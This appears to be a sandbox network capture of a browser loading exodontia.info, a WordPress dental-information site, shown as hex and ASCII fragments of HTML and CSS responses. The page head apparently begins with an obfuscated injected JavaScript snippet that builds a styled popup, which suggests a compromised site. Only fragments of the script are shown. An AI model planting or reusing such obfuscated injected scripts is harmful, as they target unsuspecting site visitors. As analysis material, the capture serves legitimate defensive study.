                                                                                                                                      2024-04-24 10:14:14 UTC665INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 65 31 28 29 7b 76 61 72 20 5f 30 78 37 36 33 37 63 34 3d 5b 27 65 64 67 65 27 2c 27 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 67 6c 6f 62 61 6c 5f 6e 61 6d 65 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 31 39 35 36 37 36 34 37 75 6f 54 65 4b 69 27 2c 27 6e 61 76 69 67 61 74 6f 72 49 6e 66 6f 27 2c 27 68 6f 73 74 27 2c 27 5b 64 61 74 61 2d 69 64 3d 5c 78 32 37 27 2c 27 62 72 6f 77 73 65 72 27 2c 27 3c 73 74 79 6c 65 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32
                                                                                                                                      Data Ascii: 10000<!DOCTYPE html><html lang="en-GB"> <head><script>function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x2
                                                                                                                                      2024-04-24 10:14:14 UTC14994INData Raw: 32 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 37 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 69 6d 67 7b 77 69 64 74 68 3a 33 32 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 73 70 61 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 62 75 74 74 6f 6e 7b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 38 37 34 63 66 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 5c 78 32 30 32 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 64 69 73 70 6c
                                                                                                                                      Data Ascii: 2,sans-serif;font-size:17px}.popup\x20img{width:32px;vertical-align:middle;margin-right:15px}.popup\x20span{padding-top:5px}.popup\x20button{padding:0;color:#fff;background-color:#3874cf;box-sizing:border-box;padding:8px\x2020px;text-decoration:none;displ
                                                                                                                                      2024-04-24 10:14:14 UTC16384INData Raw: 48 67 63 38 71 44 49 62 53 54 4b 71 34 58 6b 52 69 55 61 36 7a 55 54 6a 67 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 69 6d 70 6f 72 74 61 6e 63 65 3d 22 68 69 67 68 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 69 62 72 65 66 72 61 6e 6b 6c 69 6e 2f 76 31 34 2f 6a 69 7a 44 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34 58 6b 52 69 55 52 32 7a 63 4c 69 67 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 69 6d 70 6f 72 74 61 6e 63
                                                                                                                                      Data Ascii: Hgc8qDIbSTKq4XkRiUa6zUTjg.woff2" as="font" type="font/woff2" crossorigin importance="high"/><link rel="preload" href="https://fonts.gstatic.com/s/librefranklin/v14/jizDREVItHgc8qDIbSTKq4XkRiUR2zcLig.woff2" as="font" type="font/woff2" crossorigin importanc
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 77 70 2d 6a 73 6f 6e 2f 77 70 2f 76 32 2f 70 61 67 65 73 2f 38 39 38 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 45 64 69 74 55 52 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 3f 72 73 64 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 64 72 75 67 73 2d 66 6f 72 2d 6f 72 61 6c 2d 63 6f 6e 64 69 74 69 6f 6e 73 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 68 6f 72 74 6c 69 6e 6b 27 20 68 72 65 66 3d
                                                                                                                                      Data Ascii: dontia.info/wp-json/wp/v2/pages/898" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://exodontia.info/xmlrpc.php?rsd" /><link rel="canonical" href="https://exodontia.info/drugs-for-oral-conditions/" /><link rel='shortlink' href=
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 23 6d 6f 62 2d 6d 65 6e 75 20 2e 6d 6f 62 2d 6d 65 6e 75 2d 69 6e 6e 65 72 20 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 23 6d 6f 62 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 6d 61 69 6e 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b
                                                                                                                                      Data Ascii: ay: -ms-flexbox; display: flex; -webkit-box-pack: center; -ms-flex-pack: center; justify-content: center;}#mob-menu .mob-menu-inner { height: 100%;}#mob-menu .menu-main-navigation-container { height: 100%;
                                                                                                                                      2024-04-24 10:14:15 UTC734INData Raw: 52 46 29 20 57 61 72 6e 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 30 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 30 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 63 72 79 6f 74 68 65 72 61 70 79 2f 22 3e 43 72 79 6f 74 68 65 72 61 70 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 31 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79
                                                                                                                                      Data Ascii: RF) Warnings</a></li><li id="menu-item-350" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-350"><a href="https://exodontia.info/cryotherapy/">Cryotherapy</a></li><li id="menu-item-351" class="menu-item menu-item-type-post_ty
                                                                                                                                      2024-04-24 10:14:15 UTC1368INData Raw: 31 30 30 30 30 0d 0a 6f 6e 74 69 61 2e 69 6e 66 6f 2f 6d 6f 75 74 68 2d 73 69 6e 75 73 2d 68 6f 6c 65 73 2d 6f 72 6f 2d 61 6e 74 72 61 6c 2d 63 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2f 22 3e 4d 6f 75 74 68 2d 53 69 6e 75 73 20 48 6f 6c 65 73 20 28 4f 72 6f 2d 41 6e 74 72 61 6c 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 63
                                                                                                                                      Data Ascii: 10000ontia.info/mouth-sinus-holes-oro-antral-communications/">Mouth-Sinus Holes (Oro-Antral Communications)</a></li><li id="menu-item-354" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-354"><a href="https://exodontia.info/c
                                                                                                                                      2024-04-24 10:14:15 UTC14994INData Raw: 72 61 2d 6f 72 61 6c 61 6e 74 72 6f 73 74 6f 6d 79 2f 22 3e 43 61 6c 64 77 65 6c 6c 2d 4c 75 63 20 2f 20 49 6e 74 72 61 2d 4f 72 61 6c 20 41 6e 74 72 6f 73 74 6f 6d 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 34 33 32 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 2d 34 33 32 22 3e 3c 61 20 68 72 65 66 3d 22 23 3f 22 3e 50 6f 73 74 2d 6f 70 20 49 6e 73 74 72 75 63 74 69 6f 6e 73 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d
                                                                                                                                      Data Ascii: ra-oralantrostomy/">Caldwell-Luc / Intra-Oral Antrostomy</a></li></ul></li><li id="menu-item-432" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-432"><a href="#?">Post-op Instructions</a><ul class="sub-
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 37 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 37 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 65 61 67 6c 65 2d 73 79 6e 64 72 6f 6d 65 2f 22 3e 45 61 67 6c 65 20 53 79 6e 64 72 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 37 33 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79
                                                                                                                                      Data Ascii: ome</a></li><li id="menu-item-2274" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2274"><a href="https://exodontia.info/eagle-syndrome/">Eagle Syndrome</a></li><li id="menu-item-2273" class="menu-item menu-item-type-post_ty
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 65 6e 75 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 70 61 67 65 2d 32 36 30 20 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 33 39 20 6d 65 6e 75 2d 70 61 67 65 2d 32 36 30 2d 70 61 72 65 6e 74 2d 33 39 34 22 20 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 74 6f 6f 74 68 2d 72 65 6d 6f 76 61 6c 2d 77 61 72 6e 69 6e 67 73 2f 22 3e 54 6f 6f 74 68 20 52 65 6d 6f 76 61 6c 20 57 61 72 6e 69 6e 67 73 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 70 61 67 65 2d 33 32 32 20 6d
                                                                                                                                      Data Ascii: enu"><li class="menu-item-page-260 menu-item menu-item-type-post_type menu-item-object-page menu-item-339 menu-page-260-parent-394" ><a href="https://exodontia.info/tooth-removal-warnings/">Tooth Removal Warnings</a> </li><li class="menu-item-page-322 m


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      135192.168.2.1649905153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:14 UTC827OUTGET /wp-content/uploads/themify-concate/826651810/themify-701353600.css HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://exodontia.info/drugs-for-oral-conditions/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953653.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953653.0.0.0
                                                                                                                                      2024-04-24 10:14:15 UTC584INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:15 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Wed, 10 Apr 2024 07:22:40 GMT
                                                                                                                                      etag: "31f5f-66163e40-56a5db41e1f26eef;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 204639
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:15 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 20 54 68 65 6d 69 66 79 20 53 68 6f 70 70 65 20 35 2e 37 2e 30 20 66 72 61 6d 65 77 6f 72 6b 20 35 2e 36 2e 34 20 2a 2f 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4c 69 62 72 65 20 46 72 61 6e 6b 6c 69 6e 27 3b 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 20 20 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 69 62 72 65 66 72 61 6e 6b 6c 69 6e 2f 76 31 34 2f 6a 69 7a 42 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34
                                                                                                                                      Data Ascii: @charset "UTF-8";/* Themify Shoppe 5.7.0 framework 5.6.4 *//* vietnamese */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4f 70 65 6e 20 53 61 6e 73 27 3b 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 20 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 31 30 30 25 3b 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 20 20 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 34 30 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 38 5a 6b 57 56 34 65 77 4a 45 52 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e
                                                                                                                                      Data Ascii: font-family:'Open Sans'; font-style:italic; font-weight:400; font-stretch:100%; font-display:swap; src:url(https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4ewJER.woff2) format('woff2'); unicode-ran
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 6d 70 6f 72 74 61 6e 74 0a 7d 0a 2f 2a 20 69 4f 53 20 64 6f 65 73 6e 27 74 20 73 75 70 70 6f 72 74 20 66 69 78 65 64 20 61 74 74 61 63 68 6d 65 6e 74 20 2a 2f 0a 40 73 75 70 70 6f 72 74 73 20 28 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 20 6e 6f 6e 65 29 20 7b 0a 09 2e 74 68 65 6d 69 66 79 5f 62 75 69 6c 64 65 72 5f 72 6f 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 61 74 74 61 63 68 6d 65 6e 74 3a 20 73 63 72 6f 6c 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0a 7d 0a 2f 2a 43 4f 4c 55 4d 4e 20 41 4c 49 47 4e 4d 45 4e 54 2a 2f 0a 2f 2a 20 46 4c 45 58 20 42 4f 58 20 2a 2f 0a 2e 72 6f 77 5f 69 6e 6e 65 72 2c 0a 2e 6d 6f 64 75 6c 65 5f 63 6f 6c 75 6d 6e 2c 0a 2e 73 75 62 72 6f 77 5f 69 6e 6e 65 72 7b 0a 20 20 20 20 64 69 73 70 6c 61
                                                                                                                                      Data Ascii: mportant}/* iOS doesn't support fixed attachment */@supports (-webkit-touch-callout: none) {.themify_builder_row { background-attachment: scroll !important; }}/*COLUMN ALIGNMENT*//* FLEX BOX */.row_inner,.module_column,.subrow_inner{ displa
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 38 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 61 75 74 68 6f 72 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 63 6f 6d 6d 65 6e 74 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 65 6d 61 69 6c 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 75 72 6c 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74
                                                                                                                                      Data Ascii: 875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post
                                                                                                                                      2024-04-24 10:14:15 UTC16384INData Raw: 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 77 70 2d 62 6c 6f 63
                                                                                                                                      Data Ascii: tify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-bloc
                                                                                                                                      2024-04-24 10:14:16 UTC16384INData Raw: 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 36 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 36 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 36 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 37 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 37 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67
                                                                                                                                      Data Ascii: .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-imag
                                                                                                                                      2024-04-24 10:14:16 UTC16384INData Raw: 6d 6d 65 6e 74 2d 61 76 61 74 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 35 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 68 65 69 67 68 74 3a 32 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 37 35 65 6d 3b 77 69 64 74 68 3a 32 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 63 6f 6d 6d 65 6e 74 73 5b 63 6c 61 73 73 2a 3d 2d 66 6f 6e 74 2d 73 69 7a 65 5d 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 63 6f 6d 6d 65 6e 74 73 5b 73 74 79 6c 65 2a 3d 66 6f 6e 74 2d 73 69 7a 65 5d 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62
                                                                                                                                      Data Ascii: mment-avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{font-size:inherit}.wp-block-latest-posts{box-sizing:border-b
